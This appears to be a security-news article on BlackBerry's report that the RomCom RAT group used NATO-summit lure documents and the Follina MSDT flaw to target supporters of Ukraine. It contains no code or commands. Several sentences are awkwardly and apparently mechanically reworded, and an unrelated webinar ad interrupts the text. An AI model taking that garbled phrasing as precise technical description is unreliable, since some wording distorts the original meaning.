The threat actor behind the RomCom RAT is suspected of carrying out targeted phishing attacks upcoming NATO summit in Vilnius as well as identified organizations supporting Ukraine abroad.
The findings come from BlackBerry’s Threat Intelligence and Research team, who found two malicious documents sent from a Hungarian IP address on July 4, 2023.
RomCom, also traced under the names Tropical Scorpius, UNC2596, and Void Rabisu, was recently observed carrying out cyberattacks against politicians in Ukraine who cooperate with Western countries and US-based healthcare organizations involved in helping refugees who escape from war torn country. .
The attack chain mounted by the group is geopolitically motivated and has used spear-phishing emails to redirect victims to cloned websites hosting trojan versions of popular software. Targets include the military, food supply chains and IT companies.
The most recent lure document identified by BlackBerry masquerading as the World Congress of Ukraine, a legitimate non-profit organization, (“Overview_of_UWCs_UkraineInNATO_campaign.docx“) and displays a fake letter expressing support for Ukraine’s entry into NATO (“Letter_NATO_Summit_Vilnius_2023_ENG(1).docx“).
“While we have not found the initial infection vector, threat actors likely relied on spear-phishing techniques, engaging their victims to click on a specially crafted replica of the Ukraine World Congress website,” the Canadian company said in a published analysis. last week.
Opening the file triggers a sophisticated execution sequence that requires fetching an intermediate payload from a remote server, which, in turn, exploits Follina (CVE-2022-30190), a now-patched security flaw affecting the Microsoft Support Diagnostic Tool (MSDT), to achieve code execution long distance.
🔐 PAM Security – Expert Solution to Secure Your Sensitive Accounts
This expert-led webinar will equip you with the knowledge and strategies you need to change your privileged access security strategy.
The result was the implementation of the RomCom RAT, an executable written in C++ designed to gather information about compromised systems and remotely sequester it.
“Based on the upcoming NATO summit and related bogus documents sent by threat actors, the intended victims are representatives of Ukraine, foreign organizations and individuals supporting Ukraine,” BlackBerry said.
“Based on available information, we have moderate to high confidence to conclude that this is a renamed RomCom operation, or that one or more members of the RomCom threat group are behind this new campaign supporting the new threat group.”